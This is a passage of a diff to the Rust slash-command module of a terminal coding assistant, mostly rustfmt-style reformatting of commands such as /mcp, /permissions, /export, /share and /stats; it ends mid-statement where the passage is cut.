#[async_trait] impl SlashCommand for NormalCommand { - fn name(&self) -> &str { "normal" } - fn description(&self) -> &str { "Deactivate speech mode (caveman/rocky)" } + fn name(&self) -> &str { + "normal" + } + fn description(&self) -> &str { + "Deactivate speech mode (caveman/rocky)" + } fn help(&self) -> &str { "Usage: /normal\n\nDeactivate any active speech mode and return to normal output." } async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult { - CommandResult::SpeechMode { mode: None, level: "full".to_string() } + CommandResult::SpeechMode { + mode: None, + level: "full".to_string(), + } } } @@ -2762,8 +3002,12 @@ impl SlashCommand for NormalCommand { #[async_trait] impl SlashCommand for InitCommand { - fn name(&self) -> &str { "init" } - fn description(&self) -> &str { "Initialize a new project with AGENTS.md" } + fn name(&self) -> &str { + "init" + } + fn description(&self) -> &str { + "Initialize a new project with AGENTS.md" + } async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult { let path = ctx.working_dir.join("AGENTS.md"); @@ -2782,10 +3026,7 @@ impl SlashCommand for InitCommand { - List important files and their purposes\n"; match tokio::fs::write(&path, default_content).await { - Ok(()) => CommandResult::Message(format!( - "Created AGENTS.md at {}", - path.display() - )), + Ok(()) => CommandResult::Message(format!("Created AGENTS.md at {}", path.display())), Err(e) => CommandResult::Error(format!("Failed to create AGENTS.md: {}", e)), } } @@ -2795,8 +3036,12 @@ impl SlashCommand for InitCommand { #[async_trait] impl SlashCommand for ReviewCommand { - fn name(&self) -> &str { "review" } - fn description(&self) -> &str { "Review code changes via LLM and optionally post to GitHub PR" } + fn name(&self) -> &str { + "review" + } + fn description(&self) -> &str { + "Review code changes via LLM and optionally post to GitHub PR" + } fn help(&self) -> &str { "Usage: /review [base-ref]\n\n\ Runs `git diff ...HEAD` (or `git diff --cached` when no base is given),\n\ @@ -2840,10 +3085,7 @@ impl SlashCommand for ReviewCommand { } Ok(o) => { let stderr = String::from_utf8_lossy(&o.stderr); - return CommandResult::Error(format!( - "git diff failed: {}", - stderr.trim() - )); + return CommandResult::Error(format!("git diff failed: {}", stderr.trim())); } Err(e) => return CommandResult::Error(format!("Failed to run git: {}", e)), } @@ -3006,14 +3248,11 @@ impl SlashCommand for ReviewCommand { Ok(resp) => { let status = resp.status().as_u16(); let body = resp.text().await.unwrap_or_default(); - github_post_result = Some(format!( - "\nGitHub API returned {}: {}", - status, body - )); + github_post_result = + Some(format!("\nGitHub API returned {}: {}", status, body)); } Err(e) => { - github_post_result = - Some(format!("\nFailed to post to GitHub: {}", e)); + github_post_result = Some(format!("\nFailed to post to GitHub: {}", e)); } } } else { @@ -3125,8 +3364,12 @@ fn parse_github_remote_url(url: &str) -> Option<(String, String)> { #[async_trait] impl SlashCommand for ImportConfigCommand { - fn name(&self) -> &str { "import-config" } - fn description(&self) -> &str { "Import CLAUDE.md and settings.json from ~/.claude" } + fn name(&self) -> &str { + "import-config" + } + fn description(&self) -> &str { + "Import CLAUDE.md and settings.json from ~/.claude" + } fn help(&self) -> &str { "Usage: /import-config\n\ Import user-level Claude Code configuration from ~/.claude:\n\ @@ -3144,8 +3387,12 @@ impl SlashCommand for ImportConfigCommand { #[async_trait] impl SlashCommand for HooksCommand { - fn name(&self) -> &str { "hooks" } - fn description(&self) -> &str { "Show configured event hooks" } + fn name(&self) -> &str { + "hooks" + } + fn description(&self) -> &str { + "Show configured event hooks" + } fn help(&self) -> &str { "Usage: /hooks\n\ Show hooks configured in settings.json under 'hooks'.\n\ @@ -3184,8 +3431,12 @@ impl SlashCommand for HooksCommand { #[async_trait] impl SlashCommand for McpCommand { - fn name(&self) -> &str { "mcp" } - fn description(&self) -> &str { "Show MCP server status and manage connections" } + fn name(&self) -> &str { + "mcp" + } + fn description(&self) -> &str { + "Show MCP server status and manage connections" + } fn help(&self) -> &str { "Usage: /mcp [list|status|auth |connect |logs |resources|prompts|get-prompt ...]\n\n\ Manages Model Context Protocol (MCP) servers.\n\ @@ -3285,16 +3536,11 @@ impl SlashCommand for McpCommand { if sub == "status" { let mut output = String::from("MCP Server Status\n─────────────────\n"); for srv in &ctx.config.mcp_servers { - let kind = match srv.server_type.as_str() { - "stdio" => "stdio", - "sse" => "sse", - "http" => "http", - other => other, - }; + let kind = srv.server_type.as_str(); let endpoint = srv .url .as_deref() - .or_else(|| srv.command.as_deref()) + .or(srv.command.as_deref()) .unwrap_or("(unknown)"); // Fetch live status from the manager if available. @@ -3316,7 +3562,7 @@ impl SlashCommand for McpCommand { output.push_str( "\nNote: MCP manager is not active in this session.\n\ Restart Coven Code to connect to MCP servers.\n\ - Use /mcp connect to retry a single server." + Use /mcp connect to retry a single server.", ); } return CommandResult::Message(output); @@ -3356,7 +3602,7 @@ impl SlashCommand for McpCommand { } output.push_str( "\nSubcommands: status | auth | connect | logs \n\ - Also: resources | prompts | get-prompt [key=val ...]" + Also: resources | prompts | get-prompt [key=val ...]", ); CommandResult::Message(output) } @@ -3370,15 +3616,29 @@ impl McpCommand { /// /// For stdio servers: shows env-var auth instructions. async fn handle_auth(server_name: &str, ctx: &CommandContext) -> CommandResult { - let srv = match ctx.config.mcp_servers.iter().find(|s| s.name == server_name) { + let srv = match ctx + .config + .mcp_servers + .iter() + .find(|s| s.name == server_name) + { Some(s) => s, None => { - let configured: Vec<&str> = ctx.config.mcp_servers.iter().map(|s| s.name.as_str()).collect(); + let configured: Vec<&str> = ctx + .config + .mcp_servers + .iter() + .map(|s| s.name.as_str()) + .collect(); return CommandResult::Error(format!( "No MCP server named '{}' is configured.\n\ Configured servers: {}", server_name, - if configured.is_empty() { "(none)".to_string() } else { configured.join(", ") } + if configured.is_empty() { + "(none)".to_string() + } else { + configured.join(", ") + } )); } }; @@ -3410,7 +3670,10 @@ impl McpCommand { if let Some(manager) = &ctx.mcp_manager { use claurst_mcp::McpServerStatus; - if matches!(manager.server_status(server_name), McpServerStatus::Connecting) { + if matches!( + manager.server_status(server_name), + McpServerStatus::Connecting + ) { return CommandResult::Message(format!( "MCP server '{}' is currently connecting — try again shortly.", server_name @@ -3491,22 +3754,31 @@ impl McpCommand { fn handle_tools(server_filter: Option<&str>, ctx: &CommandContext) -> CommandResult { let manager = match ctx.mcp_manager.as_ref() { Some(m) => m, - None => return CommandResult::Message( - "MCP manager is not active. No tool information available.\n\ - Restart Coven Code to connect to MCP servers.".to_string() - ), + None => { + return CommandResult::Message( + "MCP manager is not active. No tool information available.\n\ + Restart Coven Code to connect to MCP servers." + .to_string(), + ) + } }; let all_tools = manager.all_tool_definitions(); let tools: Vec<_> = if let Some(filter) = server_filter { - all_tools.iter().filter(|(srv, _)| srv.as_str() == filter).collect() + all_tools + .iter() + .filter(|(srv, _)| srv.as_str() == filter) + .collect() } else { all_tools.iter().collect() }; if tools.is_empty() { return CommandResult::Message(if let Some(filter) = server_filter { - format!("No tools available from server '{}' (not connected or has no tools).", filter) + format!( + "No tools available from server '{}' (not connected or has no tools).", + filter + ) } else { "No tools available from any connected MCP server.".to_string() }); @@ -3525,9 +3797,16 @@ impl McpCommand { last_server = server.as_str(); } // Strip the "servername_" prefix for display - let bare = tool.name.strip_prefix(&format!("{}_", server)).unwrap_or(&tool.name); + let bare = tool + .name + .strip_prefix(&format!("{}_", server)) + .unwrap_or(&tool.name); let preview: String = tool.description.chars().take(80).collect(); - let ellipsis = if tool.description.len() > 80 { "…" } else { "" }; + let ellipsis = if tool.description.len() > 80 { + "…" + } else { + "" + }; out.push_str(&format!(" {}\n {}{}\n", bare, preview, ellipsis)); } CommandResult::Message(out) @@ -3537,12 +3816,21 @@ impl McpCommand { async fn handle_connect(server_name: &str, ctx: &CommandContext) -> CommandResult { // Validate that the server is configured. if !ctx.config.mcp_servers.iter().any(|s| s.name == server_name) { - let names: Vec<&str> = ctx.config.mcp_servers.iter().map(|s| s.name.as_str()).collect(); + let names: Vec<&str> = ctx + .config + .mcp_servers + .iter() + .map(|s| s.name.as_str()) + .collect(); return CommandResult::Error(format!( "No MCP server named '{}' is configured.\n\ Configured servers: {}", server_name, - if names.is_empty() { "(none)".to_string() } else { names.join(", ") } + if names.is_empty() { + "(none)".to_string() + } else { + names.join(", ") + } )); } @@ -3562,21 +3850,17 @@ impl McpCommand { let current = manager.server_status(server_name); use claurst_mcp::McpServerStatus; match current { - McpServerStatus::Connected { tool_count } => { - CommandResult::Message(format!( - "MCP server '{}' is already connected ({} tool{} available).", - server_name, - tool_count, - if tool_count == 1 { "" } else { "s" } - )) - } - McpServerStatus::Connecting => { - CommandResult::Message(format!( - "MCP server '{}' is already in the process of connecting.\n\ + McpServerStatus::Connected { tool_count } => CommandResult::Message(format!( + "MCP server '{}' is already connected ({} tool{} available).", + server_name, + tool_count, + if tool_count == 1 { "" } else { "s" } + )), + McpServerStatus::Connecting => CommandResult::Message(format!( + "MCP server '{}' is already in the process of connecting.\n\ Check back in a moment.", - server_name - )) - } + server_name + )), McpServerStatus::Disconnected { .. } | McpServerStatus::Failed { .. } => { // The McpManager doesn't expose a reconnect method — it's built at // startup. Inform the user and suggest a restart. @@ -3603,16 +3887,28 @@ impl McpCommand { fn handle_logs(server_name: &str, ctx: &CommandContext) -> CommandResult { // Validate server name. if !ctx.config.mcp_servers.iter().any(|s| s.name == server_name) { - let names: Vec<&str> = ctx.config.mcp_servers.iter().map(|s| s.name.as_str()).collect(); + let names: Vec<&str> = ctx + .config + .mcp_servers + .iter() + .map(|s| s.name.as_str()) + .collect(); return CommandResult::Error(format!( "No MCP server named '{}' is configured.\n\ Configured servers: {}", server_name, - if names.is_empty() { "(none)".to_string() } else { names.join(", ") } + if names.is_empty() { + "(none)".to_string() + } else { + names.join(", ") + } )); } - let mut lines = vec![format!("MCP Server Logs — '{}'\n──────────────────────", server_name)]; + let mut lines = vec![format!( + "MCP Server Logs — '{}'\n──────────────────────", + server_name + )]; if let Some(manager) = &ctx.mcp_manager { use claurst_mcp::McpServerStatus; @@ -3620,30 +3916,52 @@ impl McpCommand { lines.push(format!("Current status: {}", status.display())); match &status { - McpServerStatus::Disconnected { last_error: Some(e) } => { + McpServerStatus::Disconnected { + last_error: Some(e), + } => { lines.push(format!("\nLast connection error:\n {}", e)); lines.push(String::new()); lines.push("Troubleshooting:".to_string()); - lines.push(format!(" /mcp auth {} — check authentication", server_name)); - lines.push(format!(" /mcp connect {} — attempt reconnect", server_name)); + lines.push(format!( + " /mcp auth {} — check authentication", + server_name + )); + lines.push(format!( + " /mcp connect {} — attempt reconnect", + server_name + )); } McpServerStatus::Failed { error, retry_at } => { lines.push(format!("\nConnection failure:\n {}", error)); - let retry_secs = retry_at.saturating_duration_since(std::time::Instant::now()).as_secs(); + let retry_secs = retry_at + .saturating_duration_since(std::time::Instant::now()) + .as_secs(); if retry_secs > 0 { lines.push(format!(" Automatic retry in {}s", retry_secs)); } let _ = retry_at; // used above } McpServerStatus::Connected { tool_count } => { - lines.push(format!("\nServer is healthy — {} tool{} available.", tool_count, if *tool_count == 1 { "" } else { "s" })); + lines.push(format!( + "\nServer is healthy — {} tool{} available.", + tool_count, + if *tool_count == 1 { "" } else { "s" } + )); // Show catalog info if available. if let Some(catalog) = manager.server_catalog(server_name) { if !catalog.resources.is_empty() { - lines.push(format!("Resources ({}): {}", catalog.resource_count, catalog.resources.join(", "))); + lines.push(format!( + "Resources ({}): {}", + catalog.resource_count, + catalog.resources.join(", ") + )); } if !catalog.prompts.is_empty() { - lines.push(format!("Prompts ({}): {}", catalog.prompt_count, catalog.prompts.join(", "))); + lines.push(format!( + "Prompts ({}): {}", + catalog.prompt_count, + catalog.prompts.join(", ") + )); } } } @@ -3670,9 +3988,12 @@ impl McpCommand { // Hint about log files. lines.push(String::new()); - lines.push("Note: Detailed stdio output from MCP server processes is not\n\ + lines.push( + "Note: Detailed stdio output from MCP server processes is not\n\ captured by the manager. Run the server command directly in a\n\ - terminal to see its full output.".to_string()); + terminal to see its full output." + .to_string(), + ); CommandResult::Message(lines.join("\n")) } @@ -3690,7 +4011,8 @@ impl McpCommand { let resources = manager.list_all_resources(filter).await; if resources.is_empty() { return Some(CommandResult::Message( - "No resources available (servers may not support resources/list).".to_string() + "No resources available (servers may not support resources/list)." + .to_string(), )); } let mut out = format!("MCP Resources ({})\n──────────────────\n", resources.len()); @@ -3712,21 +4034,36 @@ impl McpCommand { let prompts = manager.list_all_prompts(filter).await; if prompts.is_empty() { return Some(CommandResult::Message( - "No prompt templates available (servers may not support prompts/list).".to_string() + "No prompt templates available (servers may not support prompts/list)." + .to_string(), )); } - let mut out = format!("MCP Prompt Templates ({})\n─────────────────────────\n", prompts.len()); + let mut out = format!( + "MCP Prompt Templates ({})\n─────────────────────────\n", + prompts.len() + ); for p in &prompts { let server = p.get("server").and_then(|v| v.as_str()).unwrap_or("?"); let name = p.get("name").and_then(|v| v.as_str()).unwrap_or("?"); let desc = p.get("description").and_then(|v| v.as_str()).unwrap_or(""); - let args: Vec = p.get("arguments") + let args: Vec = p + .get("arguments") .and_then(|a| a.as_array()) - .map(|arr| arr.iter() - .filter_map(|a| a.get("name").and_then(|n| n.as_str()).map(|s| s.to_string())) - .collect()) + .map(|arr| { + arr.iter() + .filter_map(|a| { + a.get("name") + .and_then(|n| n.as_str()) + .map(|s| s.to_string()) + }) + .collect() + }) .unwrap_or_default(); - let args_display = if args.is_empty() { String::new() } else { format!(" ({})", args.join(", ")) }; + let args_display = if args.is_empty() { + String::new() + } else { + format!(" ({})", args.join(", ")) + }; if desc.is_empty() { out.push_str(&format!(" [{server}] {name}{args_display}\n")); } else { @@ -3740,13 +4077,22 @@ impl McpCommand { // /mcp get-prompt [key=val key2=val2 ...] let server = match parts.get(1) { Some(s) => *s, - None => return Some(CommandResult::Error("Usage: /mcp get-prompt [key=value ...]".to_string())), + None => { + return Some(CommandResult::Error( + "Usage: /mcp get-prompt [key=value ...]".to_string(), + )) + } }; let prompt_name = match parts.get(2) { Some(p) => *p, - None => return Some(CommandResult::Error("Usage: /mcp get-prompt [key=value ...]".to_string())), + None => { + return Some(CommandResult::Error( + "Usage: /mcp get-prompt [key=value ...]".to_string(), + )) + } }; - let mut args: std::collections::HashMap = std::collections::HashMap::new(); + let mut args: std::collections::HashMap = + std::collections::HashMap::new(); if let Some(kv_str) = parts.get(3) { for kv in kv_str.split_whitespace() { if let Some((k, v)) = kv.split_once('=') { @@ -3761,7 +4107,9 @@ impl McpCommand { for msg in &result.messages { let text = match &msg.content { claurst_mcp::PromptMessageContent::Text { text } => text.clone(), - claurst_mcp::PromptMessageContent::Image { .. } => "[image]".to_string(), + claurst_mcp::PromptMessageContent::Image { .. } => { + "[image]".to_string() + } claurst_mcp::PromptMessageContent::Resource { resource } => { resource.to_string() } @@ -3770,7 +4118,10 @@ impl McpCommand { } Some(CommandResult::UserMessage(injected.trim().to_string())) } - Err(e) => Some(CommandResult::Error(format!("Failed to get prompt '{}' from '{}': {}", prompt_name, server, e))), + Err(e) => Some(CommandResult::Error(format!( + "Failed to get prompt '{}' from '{}': {}", + prompt_name, server, e + ))), } } _ => None, @@ -3782,8 +4133,12 @@ impl McpCommand { #[async_trait] impl SlashCommand for PermissionsCommand { - fn name(&self) -> &str { "permissions" } - fn description(&self) -> &str { "View or change tool permission settings" } + fn name(&self) -> &str { + "permissions" + } + fn description(&self) -> &str { + "View or change tool permission settings" + } fn help(&self) -> &str { "Usage: /permissions [set |allow |deny |reset]\n\n\ Modes: default, accept-edits, bypass-permissions, plan\n\n\ @@ -3818,9 +4173,7 @@ impl SlashCommand for PermissionsCommand { Use /permissions set to change the permission mode.\n\ Use /permissions allow|deny to override individual tools.\n\ Use /permissions reset to clear all overrides.", - ctx.config.permission_mode, - allowed_display, - denied_display, + ctx.config.permission_mode, allowed_display, denied_display, )); } @@ -3832,16 +4185,24 @@ impl SlashCommand for PermissionsCommand { "set" => { let mode = match arg.to_lowercase().as_str() { "default" => claurst_core::config::PermissionMode::Default, - "accept-edits" | "accept_edits" => claurst_core::config::PermissionMode::AcceptEdits, - "bypass-permissions" | "bypass_permissions" => claurst_core::config::PermissionMode::BypassPermissions, + "accept-edits" | "accept_edits" => { + claurst_core::config::PermissionMode::AcceptEdits + } + "bypass-permissions" | "bypass_permissions" => { + claurst_core::config::PermissionMode::BypassPermissions + } "plan" => claurst_core::config::PermissionMode::Plan, - _ => return CommandResult::Error( - "Mode must be: default, accept-edits, bypass-permissions, or plan".to_string() - ), + _ => { + return CommandResult::Error( + "Mode must be: default, accept-edits, bypass-permissions, or plan" + .to_string(), + ) + } }; let mut new_config = ctx.config.clone(); new_config.permission_mode = mode.clone(); - if let Err(e) = save_settings_mutation(|s| s.config.permission_mode = mode.clone()) { + if let Err(e) = save_settings_mutation(|s| s.config.permission_mode = mode.clone()) + { return CommandResult::Error(format!("Failed to save: {}", e)); } CommandResult::ConfigChangeMessage( @@ -3918,8 +4279,12 @@ impl SlashCommand for PermissionsCommand { #[async_trait] impl SlashCommand for PlanCommand { - fn name(&self) -> &str { "plan" } - fn description(&self) -> &str { "Enter plan mode – model outputs a plan for approval before acting" } + fn name(&self) -> &str { + "plan" + } + fn description(&self) -> &str { + "Enter plan mode – model outputs a plan for approval before acting" + } fn help(&self) -> &str { "Usage: /plan [description]\n\n\ Switches to plan mode where the model will create a detailed plan before executing.\n\ @@ -3930,7 +4295,7 @@ impl SlashCommand for PlanCommand { async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { if args.trim() == "exit" { return CommandResult::UserMessage( - "[Exiting plan mode. Resuming normal execution.]".to_string() + "[Exiting plan mode. Resuming normal execution.]".to_string(), ); } let task_desc = if args.is_empty() { @@ -3951,13 +4316,20 @@ impl SlashCommand for PlanCommand { #[async_trait] impl SlashCommand for TasksCommand { - fn name(&self) -> &str { "tasks" } - fn aliases(&self) -> Vec<&str> { vec!["bashes"] } - fn description(&self) -> &str { "List and manage background tasks" } + fn name(&self) -> &str { + "tasks" + } + fn aliases(&self) -> Vec<&str> { + vec!["bashes"] + } + fn description(&self) -> &str { + "List and manage background tasks" + } async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult { CommandResult::UserMessage( - "Please list all current tasks using the TaskList tool and show their status.".to_string() + "Please list all current tasks using the TaskList tool and show their status." + .to_string(), ) } } @@ -3966,9 +4338,15 @@ impl SlashCommand for TasksCommand { #[async_trait] impl SlashCommand for SessionCommand { - fn name(&self) -> &str { "session" } - fn aliases(&self) -> Vec<&str> { vec!["remote"] } - fn description(&self) -> &str { "Show or manage conversation sessions" } + fn name(&self) -> &str { + "session" + } + fn aliases(&self) -> Vec<&str> { + vec!["remote"] + } + fn description(&self) -> &str { + "Show or manage conversation sessions" + } async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { match args.trim() { @@ -4032,7 +4410,11 @@ impl SlashCommand for SessionCommand { for sess in sessions.iter().take(5) { let updated = sess.updated_at.format("%Y-%m-%d %H:%M").to_string(); let id_short = &sess.id[..sess.id.len().min(8)]; - let marker = if sess.id == ctx.session_id { " ◀ current" } else { "" }; + let marker = if sess.id == ctx.session_id { + " ◀ current" + } else { + "" + }; output.push_str(&format!( " {} | {} | {} messages | {}{}\n", id_short, @@ -4042,13 +4424,18 @@ impl SlashCommand for SessionCommand { marker, )); } - output.push_str("\nUse /session list for all sessions, /resume to switch."); + output.push_str( + "\nUse /session list for all sessions, /resume to switch.", + ); } CommandResult::Message(output) } } - _ => CommandResult::Error(format!("Unknown subcommand: {}\n\nUsage: /session [list]", args)), + _ => CommandResult::Error(format!( + "Unknown subcommand: {}\n\nUsage: /session [list]", + args + )), } } } @@ -4057,8 +4444,12 @@ impl SlashCommand for SessionCommand { #[async_trait] impl SlashCommand for ForkCommand { - fn name(&self) -> &str { "fork" } - fn description(&self) -> &str { "Fork the current session into a new branch" } + fn name(&self) -> &str { + "fork" + } + fn description(&self) -> &str { + "Fork the current session into a new branch" + } fn help(&self) -> &str { "Usage: /fork [message_index]\n\n\ Fork the current session at the specified message index (or at the\n\ @@ -4085,9 +4476,7 @@ impl SlashCommand for ForkCommand { "Fork of {}", ctx.session_title.as_deref().unwrap_or("session") )); - new_session.working_dir = Some( - ctx.working_dir.to_string_lossy().to_string(), - ); + new_session.working_dir = Some(ctx.working_dir.to_string_lossy().to_string()); let new_id = new_session.id.clone(); match claurst_core::history::save_session(&new_session).await { @@ -4104,9 +4493,15 @@ impl SlashCommand for ForkCommand { #[async_trait] impl SlashCommand for ThinkingCommand { - fn name(&self) -> &str { "thinking" } - fn description(&self) -> &str { "Toggle extended thinking mode" } - fn aliases(&self) -> Vec<&str> { vec!["think"] } + fn name(&self) -> &str { + "thinking" + } + fn description(&self) -> &str { + "Toggle extended thinking mode" + } + fn aliases(&self) -> Vec<&str> { + vec!["think"] + } async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult { // Extended thinking is configured through the model; just inform the user @@ -4114,7 +4509,8 @@ impl SlashCommand for ThinkingCommand { if model.contains("claude-3-5") || model.contains("claude-3.5") { CommandResult::Message( "Extended thinking is not available for Claude 3.5 models.\n\ - Use claude-opus-4-6 or claude-sonnet-4-6 for extended thinking.".to_string() + Use claude-opus-4-6 or claude-sonnet-4-6 for extended thinking." + .to_string(), ) } else { CommandResult::Message(format!( @@ -4193,7 +4589,12 @@ fn export_message_to_markdown( 'search: for next_msg in all_messages.iter().skip(msg_idx + 1) { if let MessageContent::Blocks(next_blocks) = &next_msg.content { for nb in next_blocks { - if let ContentBlock::ToolResult { tool_use_id, content, is_error } = nb { + if let ContentBlock::ToolResult { + tool_use_id, + content, + is_error, + } = nb + { if tool_use_id.as_str() == *tool_id { let text = match content { ToolResultContent::Text(t) => t.clone(), @@ -4209,17 +4610,27 @@ fn export_message_to_markdown( .collect::>() .join(""), }; - let label = if is_error.unwrap_or(false) { "Error" } else { "Output" }; - found_output = Some(format!("**{}:** `{}`\n", + let label = if is_error.unwrap_or(false) { + "Error" + } else { + "Output" + }; + found_output = Some(format!( + "**{}:** `{}`\n", label, - text.lines().next().unwrap_or(&text).trim())); + text.lines().next().unwrap_or(&text).trim() + )); break 'search; } } } } } - out.push_str(found_output.as_deref().unwrap_or("**Output:** *(pending)*\n")); + out.push_str( + found_output + .as_deref() + .unwrap_or("**Output:** *(pending)*\n"), + ); } } } @@ -4233,7 +4644,10 @@ fn build_markdown_export(ctx: &CommandContext) -> String { out.push_str("# Conversation Export\n\n"); out.push_str(&format!("- **Session ID:** {}\n", ctx.session_id)); out.push_str(&format!("- **Model:** {}\n", ctx.config.effective_model())); - out.push_str(&format!("- **Exported:** {}\n", chrono::Utc::now().to_rfc3339())); + out.push_str(&format!( + "- **Exported:** {}\n", + chrono::Utc::now().to_rfc3339() + )); if let Some(ref title) = ctx.session_title { out.push_str(&format!("- **Title:** {}\n", title)); } @@ -4268,8 +4682,12 @@ fn build_json_export(ctx: &CommandContext) -> serde_json::Value { #[async_trait] impl SlashCommand for ExportCommand { - fn name(&self) -> &str { "export" } - fn description(&self) -> &str { "Export conversation to markdown or JSON" } + fn name(&self) -> &str { + "export" + } + fn description(&self) -> &str { + "Export conversation to markdown or JSON" + } fn help(&self) -> &str { "Usage: /export [--format markdown|json] [--output ]\n\n\ Export the current conversation.\n\n\ @@ -4301,7 +4719,7 @@ impl SlashCommand for ExportCommand { i += 2; } else { return CommandResult::Error( - "--format requires a value: markdown or json".to_string() + "--format requires a value: markdown or json".to_string(), ); } } @@ -4310,9 +4728,7 @@ impl SlashCommand for ExportCommand { output_path = Some(tokens[i + 1].to_string()); i += 2; } else { - return CommandResult::Error( - "--output requires a file path".to_string() - ); + return CommandResult::Error("--output requires a file path".to_string()); } } other if !other.starts_with('-') => { @@ -4334,7 +4750,8 @@ impl SlashCommand for ExportCommand { Some("json") => "json", Some(other) => { return CommandResult::Error(format!( - "Unknown format '{}'. Use 'markdown' or 'json'.", other + "Unknown format '{}'. Use 'markdown' or 'json'.", + other )); } None => { @@ -4371,7 +4788,11 @@ impl SlashCommand for ExportCommand { format!( "{}.{}", filename, - if resolved_format == "markdown" { "md" } else { "json" } + if resolved_format == "markdown" { + "md" + } else { + "json" + } ) } else { filename.to_string() @@ -4390,9 +4811,9 @@ impl SlashCommand for ExportCommand { ctx.messages.len(), resolved_format, )), - Err(e) => CommandResult::Error(format!( - "Failed to write {}: {}", path.display(), e - )), + Err(e) => { + CommandResult::Error(format!("Failed to write {}: {}", path.display(), e)) + } } } None => { @@ -4407,7 +4828,9 @@ impl SlashCommand for ExportCommand { #[async_trait] impl SlashCommand for ShareCommand { - fn name(&self) -> &str { "share" } + fn name(&self) -> &str { + "share" + } fn description(&self) -> &str { "Upload the current session as a secret GitHub gist and return a shareable URL" } @@ -4462,7 +4885,11 @@ impl SlashCommand for ShareCommand { .chars() .filter(|c| c.is_ascii_alphanumeric() || *c == '-' || *c == '_') .collect(); - let stem = if safe_id.is_empty() { "session".to_string() } else { safe_id }; + let stem = if safe_id.is_empty() { + "session".to_string() + } else { + safe_id + }; let tmp = std::env::temp_dir().join(format!("claurst-session-{stem}.html")); if let Err(e) = write_session_html(&tmp, &ctx.messages, &meta) { @@ -4525,9 +4952,7 @@ impl SlashCommand for ShareCommand { "Could not auto-open the link. Copy the URL above. The gist is secret (unlisted); delete the gist to revoke access." }; - CommandResult::Message(format!( - "Share URL: {viewer}\nGist: {gist_url}\n\n{footer}" - )) + CommandResult::Message(format!("Share URL: {viewer}\nGist: {gist_url}\n\n{footer}")) } } @@ -4545,7 +4970,10 @@ fn links_url_regex() -> &'static regex::Regex { fn strip_trailing_punct(url: &str) -> String { let mut s = url.to_string(); while let Some(c) = s.chars().last() { - if matches!(c, '.' | ',' | ';' | ':' | '!' | '?' | ')' | ']' | '}' | '\'' | '"' | '>') { + if matches!( + c, + '.' | ',' | ';' | ':' | '!' | '?' | ')' | ']' | '}' | '\'' | '"' | '>' + ) { s.pop(); } else { break; @@ -4587,8 +5015,12 @@ fn extract_session_urls(messages: &[Message]) -> Vec { #[async_trait] impl SlashCommand for LinksCommand { - fn name(&self) -> &str { "links" } - fn aliases(&self) -> Vec<&str> { vec!["link"] } + fn name(&self) -> &str { + "links" + } + fn aliases(&self) -> Vec<&str> { + vec!["link"] + } fn description(&self) -> &str { "List URLs in this session and open them in your browser" } @@ -4655,9 +5087,15 @@ impl SlashCommand for LinksCommand { #[async_trait] impl SlashCommand for SkillsCommand { - fn name(&self) -> &str { "skills" } - fn aliases(&self) -> Vec<&str> { vec!["skill"] } - fn description(&self) -> &str { "List available skills in .coven-code/commands/" } + fn name(&self) -> &str { + "skills" + } + fn aliases(&self) -> Vec<&str> { + vec!["skill"] + } + fn description(&self) -> &str { + "List available skills in .coven-code/commands/" + } async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult { let mut found: Vec = Vec::new(); @@ -4673,7 +5111,7 @@ impl SlashCommand for SkillsCommand { if let Ok(entries) = std::fs::read_dir(dir) { for entry in entries.flatten() { let p = entry.path(); - if p.extension().map_or(false, |e| e == "md") { + if p.extension().is_some_and(|e| e == "md") { if let Some(stem) = p.file_stem().and_then(|s| s.to_str()) { let name = stem.to_string(); if !found.contains(&name) { @@ -4701,7 +5139,7 @@ impl SlashCommand for SkillsCommand { } } } - } else if p.extension().map_or(false, |e| e == "md") { + } else if p.extension().is_some_and(|e| e == "md") { if let Some(stem) = p.file_stem().and_then(|s| s.to_str()) { let name = stem.to_string(); if !found.contains(&name) { @@ -4715,15 +5153,13 @@ impl SlashCommand for SkillsCommand { } // Include discovered skills from .coven-code/skills/ and configured paths/URLs. - let discovered = claurst_core::discover_skills( - &ctx.working_dir, - &ctx.config.skills, - ); + let discovered = claurst_core::discover_skills(&ctx.working_dir, &ctx.config.skills); let mut output = if found.is_empty() && discovered.is_empty() { return CommandResult::Message( "No skills found.\nCreate .md files in .coven-code/commands/ to define skills.\n\ - Example: .coven-code/commands/review.md".to_string(), + Example: .coven-code/commands/review.md" + .to_string(), ); } else if found.is_empty() { String::new() @@ -4732,7 +5168,11 @@ impl SlashCommand for SkillsCommand { format!( "Available skills ({}):\n{}", found.len(), - found.iter().map(|s| format!(" /{}", s)).collect::>().join("\n") + found + .iter() + .map(|s| format!(" /{}", s)) + .collect::>() + .join("\n") ) }; @@ -4763,8 +5203,12 @@ impl SlashCommand for SkillsCommand { #[async_trait] impl SlashCommand for RewindCommand { - fn name(&self) -> &str { "rewind" } - fn description(&self) -> &str { "Interactively select a message to rewind to" } + fn name(&self) -> &str { + "rewind" + } + fn description(&self) -> &str { + "Interactively select a message to rewind to" + } fn help(&self) -> &str { "Usage: /rewind\n\ Opens an interactive overlay to select the message to rewind to.\n\ @@ -4773,7 +5217,9 @@ impl SlashCommand for RewindCommand { async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult { if ctx.messages.is_empty() { - return CommandResult::Message("Nothing to rewind — conversation is empty.".to_string()); + return CommandResult::Message( + "Nothing to rewind — conversation is empty.".to_string(), + ); } CommandResult::OpenRewindOverlay } @@ -4783,8 +5229,12 @@ impl SlashCommand for RewindCommand { #[async_trait] impl SlashCommand for StatsCommand { - fn name(&self) -> &str { "stats" } - fn description(&self) -> &str { "Show token usage and cost statistics" } + fn name(&self) -> &str { + "stats" + } + fn description(&self) -> &str { + "Show token usage and cost statistics" + } fn help(&self) -> &str { "Usage: /stats\n\n\ Shows detailed token usage and cost breakdown for the current session,\n\ @@ -4802,15 +5252,21 @@ impl SlashCommand for StatsCommand { let model = ctx.config.effective_model(); // Count user/assistant turns separately. - let user_turns = ctx.messages.iter() + let user_turns = ctx + .messages + .iter() .filter(|m| m.role == claurst_core::types::Role::User) .count(); - let assistant_turns = ctx.messages.iter() + let assistant_turns = ctx + .messages + .iter() .filter(|m| m.role == claurst_core::types::Role::Assistant) .count(); // Count tool-use invocations. - let 